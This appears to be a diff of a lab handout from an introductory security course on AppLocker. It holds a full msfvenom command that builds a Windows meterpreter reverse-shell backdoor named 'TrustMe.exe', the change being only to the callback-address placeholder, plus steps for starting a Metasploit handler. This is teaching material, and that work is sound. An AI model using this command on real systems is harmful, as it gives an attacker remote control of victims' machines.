strandjs/IntroLabs/IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md

 Run the following commands to start a simple backdoor and backdoor listener:

-<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[YOUR LINUX IP] lport=4444 -f exe -o /mnt/windows-share/TrustMe.exe</pre>
+<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=[YOUR IP Address] lport=4444 -f exe -o /mnt/windows-share/TrustMe.exe</pre>

 Let's start the **Metasploit Handler**.
 First, open a new **Kali** instance.
 The easiest way to do this is by clicking on the **Kali** icon in the taskbar.